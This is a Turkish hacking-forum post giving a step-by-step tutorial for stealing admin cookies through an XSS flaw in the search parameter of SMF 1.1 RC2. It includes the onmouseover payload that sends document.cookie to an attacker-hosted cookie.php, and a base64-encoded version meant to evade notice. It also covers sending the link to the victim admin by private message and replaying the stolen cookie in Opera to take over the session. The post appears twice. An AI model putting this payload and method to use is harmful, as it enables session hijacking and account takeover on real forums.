SMF 1.1 RC2.’deki XSS Cookie Açığı - The-Sabotage Cyber Hackers And Security Platform

COZy · 06-11-2007, 13:41

Güvenlik Açığı : SMF index.php{search}Xss Cookie Çalma

Önce Snifferimizi Hazırlayalım
[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]
Dosyaları Free Yada Kendi Hostunuza Atın

Dosyalar
Cookie.php Ve log.txt

Log.txt in CHMOD Ayarını 777 Yapın Yani Full Yetki Verin

Bu Kadarı Tamam
--------------------------------------------------------------------------
SMF 1.1 RC2 Deki XSS Yiyen Yer

/index.php?action=search;params=[XSSKodu]

Cookie Çalma Kodu

CODE
maxage|’|" style="position:absolute; top:0px; left:0px; width:1000px; height:1000px;"onmouseover="document.********=’htt p://siteniz.com/cookie.php?cookie=’+escape(document.cookie)""|"|br d|’||"|show_complete|’||"|subject_only|’||"|sea rch |’|lol

Cookie Bilgisi Size Gelmesi İçin 1. İşlemdeki Sitenize Yüklediğiniz Cookie.php Linkini Yukarda Verdiğim Çalma Kodu İçerisindeki [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] Yer İle Değiştirin.

Şimdi Hacklemek İstediğimiz Site Çakmasın Diye Cookie Çalma Kodumuzu Base64Code İle Kapatalım
[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]
Bu Siteden Cookie Çalma Kodunuzu Encodeleyin.

Kodladıktan Sonra

/index.php?action=search;params=bWF4YWdlfCd8IiBzdHl sZT0icG9zaXRpb246YWJzb2x1dGU7IH RvcDowcHg7IGxlZnQ6MHB4OyB3aWR0aDoxMDAwcHg7IGhlaWdo dDoxMDAwcHg7IiBvbm1vdXNlb3Zlcj0iZG9jdW1lbnQubG9jYX Rpb249J2h0dHA6Ly9zaXRlbml6LmNvbS9jb29raWUucGhwP2Nv b2tpZT0nK2VzY2FwZShkb2N1bWVudC5jb29raWUpIiJ8Inxicm R8J3x8InxzaG93X2NvbXBsZXRlfCd8fCJ8c3ViamVjdF9vbmx5 fCd8fCJ8c2VhcmNofCd8bG9s

Kodumuzu Birleştirelim

Şimdi Herşey Hazır Hacklemek İstediğiniz SMF 1.1 RC2 Sistemine

Üye Olun Admine PM Yolu İle Bu Linki Gönderirsiniz

örnek : kurbaninsitesi/forum/index.php?action=search;params=bWF4YWdlfCd8IiBzdHl sZT0icG9zaXRpb246YWJzb2x1dGU7IHRvcDowcHg7IGxlZnQ6M HB4OyB3aWR0aDoxMDAwcHg7IGhlaWdodDoxMDAwcHg7IiBvbm1 vdXNlb3Zlcj0iZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9za XRlbml6LmNvbS9jb29raWUucGhwP2Nvb2tpZT0nK2VzY2FwZSh kb2N1bWVudC5jb29raWUpIiJ8InxicmR8J3x8InxzaG93X2Nvb XBsZXRlfCd8fCJ8c3ViamVjdF9vbmx5fCd8fCJ8c2VhcmNofCd 8bG9s

Admin Linke Tıkladığında

Cookie Bilgileri Direkmen

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] İçerisine Kayıt Olacaktır Bilgiler Size Ulaştıktan Sonra

Operayın Download Edin.
Burdan
[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

Operayı kurun Sonra Kurbanın Sitesine Girin
Üye Girişi Yapın Normal Üyelik Alarak
Giriş Yaparken Sürekli Baglı Kalma Seçeneğini Seçin

Daha Sonra Operanın Yukarıdaki Araçlar Sekmesinden Gelişmiş >> Çerezler e Girin Orda Cookie Bilgilerini Size Gelen Cookie İle Değiştirin.

Tamamı Tıklayın VE Sayfayı Yenileyin

06-11-2007, 13:41	#1 (permalink)
COZy Yüzbaşı Üyelik tarihi: Jun 2007 Mesajlar: 337	SMF 1.1 RC2.’deki XSS Cookie Açığı Güvenlik Açığı : SMF index.php{search}Xss Cookie Çalma Önce Snifferimizi Hazırlayalım [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] Dosyaları Free Yada Kendi Hostunuza Atın Dosyalar Cookie.php Ve log.txt Log.txt in CHMOD Ayarını 777 Yapın Yani Full Yetki Verin Bu Kadarı Tamam -------------------------------------------------------------------------- SMF 1.1 RC2 Deki XSS Yiyen Yer /index.php?action=search;params=[XSSKodu] Cookie Çalma Kodu CODE maxage\|’\|" style="position:absolute; top:0px; left:0px; width:1000px; height:1000px;"onmouseover="document.******=’htt p://siteniz.com/cookie.php?cookie=’+escape(document.cookie)""\|"\|br d\|’\|\|"\|show_complete\|’\|\|"\|subject_only\|’\|\|"\|sea rch \|’\|lol Cookie Bilgisi Size Gelmesi İçin 1. İşlemdeki Sitenize Yüklediğiniz Cookie.php Linkini Yukarda Verdiğim Çalma Kodu İçerisindeki [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] Yer İle Değiştirin. Şimdi Hacklemek İstediğimiz Site Çakmasın Diye Cookie Çalma Kodumuzu Base64Code İle Kapatalım [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] Bu Siteden Cookie Çalma Kodunuzu Encodeleyin. Kodladıktan Sonra /index.php?action=search;params=bWF4YWdlfCd8IiBzdHl sZT0icG9zaXRpb246YWJzb2x1dGU7IH RvcDowcHg7IGxlZnQ6MHB4OyB3aWR0aDoxMDAwcHg7IGhlaWdo dDoxMDAwcHg7IiBvbm1vdXNlb3Zlcj0iZG9jdW1lbnQubG9jYX Rpb249J2h0dHA6Ly9zaXRlbml6LmNvbS9jb29raWUucGhwP2Nv b2tpZT0nK2VzY2FwZShkb2N1bWVudC5jb29raWUpIiJ8Inxicm R8J3x8InxzaG93X2NvbXBsZXRlfCd8fCJ8c3ViamVjdF9vbmx5 fCd8fCJ8c2VhcmNofCd8bG9s Kodumuzu Birleştirelim Şimdi Herşey Hazır Hacklemek İstediğiniz SMF 1.1 RC2 Sistemine Üye Olun Admine PM Yolu İle Bu Linki Gönderirsiniz örnek : kurbaninsitesi/forum/index.php?action=search;params=bWF4YWdlfCd8IiBzdHl sZT0icG9zaXRpb246YWJzb2x1dGU7IHRvcDowcHg7IGxlZnQ6M HB4OyB3aWR0aDoxMDAwcHg7IGhlaWdodDoxMDAwcHg7IiBvbm1 vdXNlb3Zlcj0iZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9za XRlbml6LmNvbS9jb29raWUucGhwP2Nvb2tpZT0nK2VzY2FwZSh kb2N1bWVudC5jb29raWUpIiJ8InxicmR8J3x8InxzaG93X2Nvb XBsZXRlfCd8fCJ8c3ViamVjdF9vbmx5fCd8fCJ8c2VhcmNofCd 8bG9s Admin Linke Tıkladığında Cookie Bilgileri Direkmen [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] İçerisine Kayıt Olacaktır Bilgiler Size Ulaştıktan Sonra Operayın Download Edin. Burdan [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]** Operayı kurun Sonra Kurbanın Sitesine Girin Üye Girişi Yapın Normal Üyelik Alarak Giriş Yaparken Sürekli Baglı Kalma Seçeneğini Seçin Daha Sonra Operanın Yukarıdaki Araçlar Sekmesinden Gelişmiş >> Çerezler e Girin Orda Cookie Bilgilerini Size Gelen Cookie İle Değiştirin. Tamamı Tıklayın VE Sayfayı Yenileyin

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)